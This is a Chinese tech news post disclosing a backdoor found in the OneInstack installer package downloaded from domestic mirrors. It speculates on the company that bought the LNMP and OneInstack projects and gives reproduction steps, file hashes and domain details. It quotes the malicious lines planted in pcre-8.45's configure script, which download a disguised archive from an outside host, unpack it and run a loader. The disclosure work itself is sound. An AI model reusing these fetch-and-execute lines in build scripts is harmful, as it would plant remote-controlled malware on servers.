早前蓝点网提到国内安全公司发现 LNMP 一键安装包出现后门程序,原本大家以为是服务器被黑了。
在 lnmp 一键安装包官网,至今没有发布关于这个安全事件的公告,而且网站也变更为金华市矜贵网络科技有限公司 (下称金华矜贵),金华矜贵还是另一个 Linux 面板 WDCP 的所有者。
值得注意的是,国内的另一款 Linux 面板 oneinstack 目前也挂上了金华矜贵的备案号,这说明金华矜贵已经买下了 lnmp 一键安装包和 oneinstack。
另外该公司还准备买下秋水逸冰的 lamp 一键安装包 (lamp[.]sh),不过已经被秋大拒绝。
所以这一下子买下国内过个规模不算特别大的 Linux 面板,金华矜贵的目的看起来是要做个能与宝塔面板抗衡的新面板?只不过购买这些面板只是相当于买下习惯使用这些面板的用户,后面是否会开发一个新面板就是个问题了。
复现步骤
(从海外节点下载暂未发现有此问题)
- 检查
mirrors.oneinstack.com是否 CNAME 到seo-one-01.xnsksstack.com,这个域名的 DNS 为 DNSPod ,国内解析为 CNAMEmirrors.oneinstack.com.w.cdngslb.com。 - 对于阿里云 CDN(含恶意代码),海外解析为 A 记录
47.251.13.6(阿里云美国单点)。 - 对于国内机器或手动指定
mirrors.oneinstack.com.w.cdngslb.com的国内 IP。
复现命令
wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz
tar -xzf oneinstack-full.tar.gz
cd oneinstack/src
tar -xzf pcre-8.45.tar.gz
cd pcre-8.45
grep -r "oneinstack.club" pcre-8.45
复现结果
pcre-8.45/configure 第 6883 行:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
验证 MD5
- 恶意包:
md5sum oneinstack-full.tar.gz结果为3dc788dd9fe0c13e3db1411e53932331 - 海外节点包(暂未发现有此问题):
aa55626f6ba9eb8cae2f5a3d9c6c9b96
国内国外包对比(右边海外左边国内):
root@ersanwu-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/
/root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
/root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE
和 lnmp.org 和半年前的 Oneinstack 挂马(GitHub)一样。
恶意域名 oneinstack.club 注册于 2023-08-28,与 lnmp 的恶意域名 lnmp.life 的注册日期和注册商均一致。
其他信息
回到文章开头的话题,买下一个一键安装包后就出现了带有后门的版本,而且到现在还不发公告,所以到底是服务器被黑还是另有隐情就不好说了。
目前相关域名已经空解析